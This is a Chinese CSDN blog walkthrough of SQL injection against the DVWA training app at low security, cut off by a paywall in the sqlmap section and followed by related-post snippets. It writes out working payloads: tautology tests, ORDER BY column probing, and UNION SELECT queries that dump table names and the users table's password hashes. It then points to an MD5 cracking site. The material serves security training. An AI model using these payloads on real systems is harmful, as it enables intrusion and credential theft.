OWASP DVWA SQL注入与盲注low级别

已于 2022-01-19 18:45:41 修改
阅读量2k 收藏 2
点赞数
分类专栏: DVWA 文章标签: sql web安全 渗透测试
于 2022-01-12 18:15:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42906381/article/details/122459423
版权
本文介绍了在DVWA中针对SQL Injection的low级别手工注入测试和利用SQLmap自动化测试的过程。首先,展示了如何通过构造payload进行手工注入,包括猜解查询语句的字段数、获取数据库信息等。接着,利用SQLmap进行自动化测试,获取数据库名称、表名和字段信息。在SQL Injection (Blind)部分,通过二分法猜解数据库和表名,以及字段信息,揭示了数据库中的数据结构。
摘要由CSDN通过智能技术生成

DVWA

SQL Injection

测试目标网址: http://192.168.247.150/dvwa/vulnerabilities/sqli/

low安全级别

在这里插入图片描述

进行手工注入测试
1' or 1=1 #

1' or '1'='1' #

测试成功,构造payload,完成漏洞注入利用
在这里插入图片描述
猜解查询语句的字段数

1' or 1=1 order by 1 #

1' or 1=1 order by 2 #

在这里插入图片描述

获取当前数据库名称

1' union select 1,database() #

在这里插入图片描述

获取数据库中的表名

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

1' union select 1,table_name from information_schema.tables where table_schema='dvwa' #

在这里插入图片描述

获取表中的字段名

1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

在这里插入图片描述

下载数据

1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

在这里插入图片描述

MD5解密得到密码

https://www.cmd5.com/

利用SQLmap进行注入

发现SQL注入点,进行注入测试

http://192.168.247.150/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

利用语句sqlmap -u 目标地址进行测试,需要添加cookie值才能完成相关测试

可以添加–

最低0.47元/天 解锁文章
开着拖拉机卖茄子
关注
专栏目录
DVWASQL注入LOW
weixin_46831054的博客
02-17 3249
SQL注入流程 面对一个查询条件的web网页,我们需要做以下的事情 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.下载数据 这里我们用hackbar,方便我们操作。 http://192.168.5.155:85/vulnerabilities/sqli/?id=1&Submit=Submit# 利用hackbar后我们在加黑处进行命令修改,以达到手工注入的目的 1.判断是否
DVWA靶场SQL注入low
最新发布
qq_61975388的博客
08-17 648
DVWA靶场SQL注入实战
DVWA sql注入low级别
LRainner的博客
09-18 1010
DVWA sql注入low级别 sql注入分类 数字型注入 SELECT first_name, last_name FROM users WHERE user_id = $id 字符型注入 SELECT first_name, last_name FROM users WHERE user_id = ‘$id’ 一般可以通过直接输入单引号来判断是否存在注入点 通过输入3和1+2判断注入为字符型注入,若为数字型注入,则3和1+2输出一样 字符型注入 字符型注入最关键的是如何闭合SQ
DVWAsql注入low
m0_52923241的博客
03-12 565
SQL injection 先尝试输入1,可以得到正常的回显 尝试输入User ID:1’判断是否存在注入 可以判断出sql 遍历数据库表
DVWA sql注入-LOW
m0_46616663的博客
05-23 609
1.判断是否存在sql注入漏洞 出现报错,说明存在sql注入漏洞,无论是字符型还是整形都会因为单引号个数不匹配而报错。 如果未报错则未必存在sql注入,有可能存在对输入内容的过滤,采用其他方法判断是否存在注入。 2.判断注入漏洞的类型 分为两种: 数字型和字符型。 这是数据库本身存储数据时赋予给数据的类型。 先判断是否为数字型: 输入1 and 1 = 1 页面运行正常 输入1 and 1 = 2 页面也运行正常 分析: 如果查询语句为数字型的话...
Kali linux在DVWA靶场的SQL注入
qq_74298120的博客
06-20 1959
SQL注入是一种常见的攻击方式,攻击者通过利用Web应用程序或其他应用程序对数据库的查询进行注入,掌控数据库系统,甚至控制整个应用程序。为了加强Web应用程序的安全性,学习SQL注入攻击技能的同时也要了解防御措施。
dvwa——sql注入
qq_45487671的博客
05-26 2665
SQL注入攻击实验 1.实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 2.实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 3.实验过程描述 1、判断是否存在SQL注入点。 id值输入1,发现正常显示 输入
通过DVWA学习SQL注入漏洞
热门推荐
Mi1k7ea
02-21 2万+
此篇文章作为本人的学习小笔记,有任何不足之处望各位大牛多多指教~ SQL注入漏洞作为OWASP TOP10中重要的一部分,可见其安全性的危害有多大。简单地说,SQL注入就是通过构建特殊的具有SQL语法的语句,绕到数据库中进而执行相应的操作的漏洞。关于SQL注入更多的描述就不再多说了,网上资料也很多,下面就直接上笔记。 基于报错的检测方法: 各种符号以及组合: ‘  “  (  %
KALI LINUX2021环境下使用sqlmap进行DVWA中的sql注入安全等级LOW
weixin_39464539的博客
06-07 1659
KALI LINUX环境下使用sqlmap进行DVWA中的sql注入安全等级LOW)渗透环境第一步:将DVWA安全等级调整为LOW (使用谷歌Chrome浏览器)第二步:利用网页对sql是否可以注入进行简单判断第三步:使用kali 进行注入(需要注意需要加入cookie)功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTe
DVWAlow级别sql注入
weixin_30349597的博客
07-13 395
将Security level设为low,在左侧列表中选择“SQL Injection”,然后在右侧的“User ID”文本框中输入不同的数字就会显示相应的用户信息。 我们首先需要判断这里所传输的参数是文本型还是数字型,分别输入3和1+2,观察它们显示的结果并不一致,因而就判断出参数类型是文本型 接下来用sqlmap注入 ,比较简单,不过要抓包抓cookie,因为这个是登陆后的...
DVWAsql注入漏洞-low
m0_63735735的博客
07-19 1715
DVWAsql注入漏洞-low
dvwa----sql盲注low
qq_45487671的博客
05-28 1172
实验4 SQL盲注 1.实验目的 (1)理解SQL盲注(布尔盲注、时间盲注、报错盲注)的原理; (2)学习手工盲注的过程; (3)了解SQL注入的防御技术。 2.实验要求 登陆DVWA平台,结合所学SQL盲注的基本知识,爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。关键位置截图。 3.实验过程描述 服务器端源代码 low级别,查看源代码,文本框提交为get请求方式,为佳任何输入过滤限制 同时SQL语句查询返回的结果只有两种, `User ID exists in
DVWA------sql注入low)(字符型)
qwsn
11-01 1929
================================================================================== 0x01:上low源码 ================================================================================== 0x02:sql注入low) 一...
DVWA靶场全关卡---SQL注入low
weixin_63294541的博客
03-17 612
目录1、找注入点2、盲猜字段3、回显显示4、找数据库5、获取数据库中的表6、查看表中的字段7、显示字段的值8、我们就拿到了用户名和密码了! 方法顺序如下: 1' and 1=1 order by 1# 从头开始试,到几报错就是有几个字段减一。 所以,有两个字段。1'union select 1,2# (1'是闭合,union连接,select 1,2是占位) 1'union select 1,database()# -----找到数据库名称为Surname: dvwa 1' unio
OWASP TOP 10(一)SQL注入SQLi-Labs(1-9)分析思路、半自动化注入)
Pluto.的博客
12-15 438
文章目录SQL注入SQLi-LabsLess-1Less-2Less-3Less-4Less-5 SQL注入 SQLi-Labs Less-1 字符型注入 | 单引号闭合 | 联合查询 当我们传入参数 id=1 、id=2 … 页面回显不一样的内容: 说明数据库中的数据可以回显到前端页面,然后需要考虑是字符型还是数字型注入,注入单引号后: 页面回显报错信息 You have an error in your SQL syntax; check the manual that correspo
sql注入dvwalow
****的博客
09-02 273
靶机:dvwa bug:SQL Injection 难度等级:low ** 分析 ** 在输入框中分别输入“1”、“1’ and 1=1#”,“1’ and 1=1#”三条命令。发现第一条和第二条能执行成功,第三条不能执行成功,这说明这个地方存在注入点。(直接上sqlmap试试) sqlmap爆破 利用burpsuite抓取数据包,获取requests的header,存入txt文本中。 ...
Dvwa练习06 SQL注入Low
coco3105的博客
02-19 1176
等级low分别用了手工和sqlmap注入,medium没实践,high采用的是旧版本,没过滤参数。
web安全学习之基于dvwaSQL注入演练(low)
weixin_41657031的博客
07-15 436
SQL注入练习:基于DVWASQL注入演练(low) 1、设置 把安全等级先调整为low,让自己获得点信心。 2、测试和分析页面的功能 根据上面的提示,输入用户的id。然后我们输入之后,发现它返回了关于这个user的信息!这里我们输入了“1”。 它返回三行数据,一行是我们输入的用户ID。一行是用户名,另外一行是用户别名。同时,看一下浏览器的地址栏那里,发现url成这样了 这里有个id=1...
OWASP——SQL注入(一)
cas的无名博客
02-26 4570
对于OWASP发布的十大安全风险简单介绍在上一篇博文已经分享了,本文是对2013年发布的OWASP Top 10中的A1注入部分进行分享学习。
OWASP Mutillidae II实验:SQL注入与数据库探索
"这篇资料是关于OWASP Mutillidae II实验指导书的汇总,涵盖了多种网络安全漏洞的介绍和利用,特别关注了SQL注入技术在确定数据库信息过程中的应用。" 正文: 在网络安全领域,尤其是Web应用安全方面,了解和防御SQL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值